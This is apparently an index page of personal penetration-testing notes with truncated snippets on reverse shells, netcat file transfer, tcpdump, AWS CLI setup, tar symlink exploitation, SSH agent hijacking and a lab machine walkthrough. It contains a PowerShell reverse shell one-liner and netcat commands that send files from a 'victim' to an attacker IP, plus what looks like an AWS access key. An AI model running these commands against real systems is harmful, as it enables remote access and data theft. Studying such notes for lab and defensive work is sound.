Shuciran Pentesting Notes

Domain Enumeration Gathering

Security Headers: Analyze HTTP response headers and provide basic analysis of the target site’s security posture (Security Headers). SSL Server Test: Analyzes a server’s SSL/TLS configuration and compa...

Powershell Reverse Shell

Reverse Shell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2", 1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($...

Tcpdump

Read a pcap (-r read a file): sudo tcpdump -r password_cracking_filtered.pcap
Capture traffic (-i choose interface): sudo tcpdump -i tun0 icmp
Filter by src/dst host: tcpdump -n <src/dst> host 1...

Netcat File Transfer

Transfer File. From the victim machine, pipe the file's contents to the netcat listener: type .\out.txt | .\nc.exe -nv 10.10.16.2 443
Then redirect the traffic towards the destination file: nc...

Netcat File Transfer

Transfer File. Send the file's contents to the netcat listener on the victim machine: nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
Then redirect the traffic to...

Common Commands

mkdir: mkdir -p {content,exploits,nmap}
Reload zsh (useful when it is modified: alias, keys, etc.): source ~/.zshrc
Pyenv: pyenv install <version>, pyenv versions, pyenv gl...

Epsilon (Medium)

Content: Git source retrieval with GitHacker; AWS Enumeration; Lambda Function Enumeration; Authentication Bypass Abusing JWT; Server Side Template Injection (SSTI); Tar Symlink Exploitati...

AWS CLI

AWS Configuration. How to configure aws to get access to its functions:
❯ aws configure
AWS Access Key ID [****************6TDC]: AQLA5M37BDN6FJP76TDC
AWS Secret Access Key [****************Fo1A]: ...

Tar Symlink Exploitation (Linux)

Abusing dereference. Reviewing the code inside we get this:
#!/bin/bash
file=`date +%N`
/usr/bin/rm -rf /opt/backups/*
/usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/
sha1sum "/opt/backups/...

SSH Hijacking

Step 1: We first determine the SSH process ID of the user on the compromised host: ps aux | grep sshd
Step 2: Determine the SSH_AUTH_SOCK environment variable for the sshd PID: grep SSH_AUTH_SOCK ...